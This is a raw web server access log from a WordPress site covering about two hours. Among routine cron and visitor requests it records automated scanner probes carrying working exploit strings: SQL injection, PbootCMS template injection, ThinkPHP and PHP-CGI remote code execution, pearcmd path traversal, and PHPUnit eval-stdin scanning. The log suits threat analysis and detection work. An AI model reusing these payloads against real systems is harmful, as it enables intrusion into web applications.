39.191.209.32 - - [05/Oct/2025:19:27:21 +0800] "GET /[2409:8087:1e01:20::40]:80/PLTV/11/224/3221226163/1.m3u8?icpid=11&from=1&hms_devid=604&vqe=3 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
36.133.115.36 - - [05/Oct/2025:19:39:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759664363.7074079513549804687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.187.11 - - [05/Oct/2025:19:39:23 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.133.187.11 - - [05/Oct/2025:19:39:25 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Oct/2025:19:47:02 +0800] "POST /wp-cron.php?doing_wp_cron=1759664822.1530170440673828125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
39.191.209.32 - - [05/Oct/2025:19:47:02 +0800] "GET /[2409:8087:1e01:20::40]:80/PLTV/11/224/3221226163/1.m3u8?icpid=11&from=1&hms_devid=604&vqe=3 HTTP/1.1" 404 31381 "-" "ZTE/1.0.6"
45.204.215.184 - - [05/Oct/2025:19:53:53 +0800] "GET /member/record.php?action=pay&mid=-1/*!50000union*//*!50000select*/md5(1),2,md5(1),md5(1),5,6,7,8,9-- HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1"
45.204.215.184 - - [05/Oct/2025:19:53:53 +0800] "GET /admin.php?file=tag&action=preview&tag_code={phpinfo()} HTTP/1.1" 404 47 "-" "Mozilla/5.0"
45.204.215.184 - - [05/Oct/2025:19:53:53 +0800] "POST /member/chat.php?touser=admin HTTP/1.1" 404 47 "-" "Mozilla/5.0"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,6666123%252b777700%252b9%20from%20KS_Admin%2500 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /wapshop/productlist.aspx?sort=char(sys.fn_varbintohexstr(hashbytes('MD5','1234'))) HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /SubCategory.aspx?keywords=2&minSalePrice&maxSalePrice&categoryId=1&TagIds=convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(32)%2Bchar(74)%2Bchar(73)%2Bchar(64)%2B@@version))&brand=27 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
36.133.115.36 - - [05/Oct/2025:19:53:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759665234.2671980857849121093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [05/Oct/2025:19:53:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759665234.2673521041870117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /?member/login/aaaaaa}{pboot:if(true);use/**/function/**/var_dump/**/as/**/test;use/**/function/**/md5/**/as/**/test1;use/**/function/**/get/**/as/**/test3;test(test1(test3('content')));if(true)}{/pboot:if}&content=999999999 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /index.php?g=Admin&m=Login&a=checkEmail&userid=1&email=%27+AND+%28SELECT+2578+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x71706b6b71%2C%28SELECT+%28ELT%282578%3D2578%2C1%29%29%29%2C0x7162627671%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+xmVt HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /e/install/index.aspx?__EVENTTARGET&__EVENTARGUMENT&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "GET /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(32)%2Bchar(74)%2Bchar(73)%2Bchar(64)%2B@@version))%20-- HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
45.204.215.184 - - [05/Oct/2025:19:53:54 +0800] "POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp&nonce HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
45.204.215.184 - - [05/Oct/2025:19:53:55 +0800] "POST /pay/index/pay_callback.html HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:19:53:55 +0800] "POST /index.php HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
45.204.215.184 - - [05/Oct/2025:19:53:55 +0800] "POST / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
45.204.215.184 - - [05/Oct/2025:19:53:56 +0800] "POST /?tag=%7d%73%71%6c%3a%20%20%7b%70%62%6f%6f%74%3a%6c%69%73%74%20%66%69%6c%74%65%72%3d%31%3d%32%29%55%4e%49%4f%4e%28%53%45%4c%45%43%54%2f%2a%2a%2f%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%28%73%65%6c%65%63%74%2f%2a%2a%2f%76%65%72%73%69%6f%6e%28%29%29%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c%31%32%33%20%73%63%6f%64%65%3d%31%32%33%7d%5b%6c%69%73%74%3a%6c%69%6e%6b%20%6c%69%6e%6b%3d%61%73%64%5d%7b%2f%70%62%6f%6f%74%3a%6c%69%73%74%7d HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
45.204.215.184 - - [05/Oct/2025:19:53:58 +0800] "GET /zhanting/index.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,sleep(4)+--+x&skin HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.204.215.184 - - [05/Oct/2025:19:53:58 +0800] "GET /hits/?lang=cn&type=news&vid=1%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%33%39%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%31%29%29%29%45%47%4d%4c%29%20%41%4e%44%20%27%4e%49%48%48%27%3d%27%4e%49%48%48&list=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
45.204.215.184 - - [05/Oct/2025:19:54:00 +0800] "GET /zhanting/index.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,sleep(8)+--+x&skin HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.204.215.184 - - [05/Oct/2025:19:54:00 +0800] "GET /hits/?lang=cn&type=news&vid=1%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%33%39%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%31%30%29%29%29%45%47%4d%4c%29%20%41%4e%44%20%27%4e%49%48%48%27%3d%27%4e%49%48%48&list=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
45.204.215.184 - - [05/Oct/2025:19:54:01 +0800] "POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:19:54:03 +0800] "GET /upload/file/1759665243.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:19:54:19 +0800] "POST /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction HTTP/1.1" 200 17198 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
45.204.215.184 - - [05/Oct/2025:19:54:21 +0800] "POST /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction HTTP/1.1" 200 17198 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
45.204.215.184 - - [05/Oct/2025:19:54:26 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 17165 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
45.204.215.184 - - [05/Oct/2025:19:54:28 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 17165 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
36.133.115.36 - - [05/Oct/2025:20:03:09 +0800] "POST /wp-cron.php?doing_wp_cron=1759665789.8855121135711669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [05/Oct/2025:20:03:10 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:20:05:10 +0800] "POST /wp-cron.php?doing_wp_cron=1759665910.0268299579620361328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [05/Oct/2025:20:05:10 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.142.195.99 - - [05/Oct/2025:20:05:43 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.204.215.184 - - [05/Oct/2025:20:18:41 +0800] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
36.133.115.36 - - [05/Oct/2025:20:18:41 +0800] "POST /wp-cron.php?doing_wp_cron=1759666721.0582768917083740234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.204.215.184 - - [05/Oct/2025:20:18:41 +0800] "GET /index.php/?suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:20:18:42 +0800] "GET /index.php/keyword?keyword=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:20:18:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:20:18:44 +0800] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+ZJEIwJG3TU.log HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
45.204.215.184 - - [05/Oct/2025:20:18:44 +0800] "GET /?member/login/?suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
36.133.115.36 - - [05/Oct/2025:20:19:11 +0800] "POST /wp-cron.php?doing_wp_cron=1759666751.1237370967864990234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [05/Oct/2025:20:19:11 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:20:35:29 +0800] "POST /wp-cron.php?doing_wp_cron=1759667729.0188860893249511718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.18.55.217 - - [05/Oct/2025:20:35:29 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:31 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:31 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:32 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:33 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:33 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:34 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:35 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:35 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:36 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:37 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:38 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:38 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:40 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:41 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:41 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:42 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:43 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:44 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:44 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:45 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:45 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:46 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:47 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:48 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:49 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:49 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:50 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:50 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:51 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:52 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:52 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:53 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:54 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:54 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:55 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:56 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:57 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:35:58 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [05/Oct/2025:20:35:59 +0800] "POST /wp-cron.php?doing_wp_cron=1759667759.6783659458160400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.18.55.217 - - [05/Oct/2025:20:35:59 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65160 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:36:01 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:36:02 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:36:04 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:36:06 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
119.18.55.217 - - [05/Oct/2025:20:36:09 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [05/Oct/2025:20:47:06 +0800] "POST /wp-cron.php?doing_wp_cron=1759668426.4188859462738037109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [05/Oct/2025:20:47:06 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:20:50:40 +0800] "POST /wp-cron.php?doing_wp_cron=1759668640.9602870941162109375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [05/Oct/2025:20:50:41 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:20:51:21 +0800] "POST /wp-cron.php?doing_wp_cron=1759668681.4802160263061523437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
106.227.49.113 - - [05/Oct/2025:20:51:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
106.227.49.113 - - [05/Oct/2025:20:51:23 +0800] "GET / HTTP/1.1" 200 33468 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Oct/2025:20:57:11 +0800] "POST /wp-cron.php?doing_wp_cron=1759669031.0172269344329833984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.249.100.174 - - [05/Oct/2025:20:57:11 +0800] "GET /wp-content/uploads/2025/07/1753456723-%CB%AB%CF%E0%B8%D6roduct_Single600.webp HTTP/1.1" 404 31381 "http://www.cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
119.249.100.236 - - [05/Oct/2025:20:57:11 +0800] "GET /wp-content/uploads/2025/07/1753456770-%C8%C8%B6%C6%D0%BF%BE%EDproduct_Single600.webp HTTP/1.1" 404 31381 "http://www.cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
62.182.76.177 - - [05/Oct/2025:21:03:13 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [05/Oct/2025:21:03:14 +0800] "POST /wp-cron.php?doing_wp_cron=1759669394.1496651172637939453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [05/Oct/2025:21:06:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759669614.2552399635314941406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [05/Oct/2025:21:06:54 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:21:14:33 +0800] "POST /wp-cron.php?doing_wp_cron=1759670073.9335980415344238281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [05/Oct/2025:21:14:34 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Oct/2025:21:19:10 +0800] "POST /wp-cron.php?doing_wp_cron=1759670350.4219460487365722656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.109 - - [05/Oct/2025:21:19:10 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
42.236.101.223 - - [05/Oct/2025:21:22:21 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [05/Oct/2025:21:22:25 +0800] "POST /wp-cron.php?doing_wp_cron=1759670545.3603620529174804687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.101.223 - - [05/Oct/2025:21:22:25 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
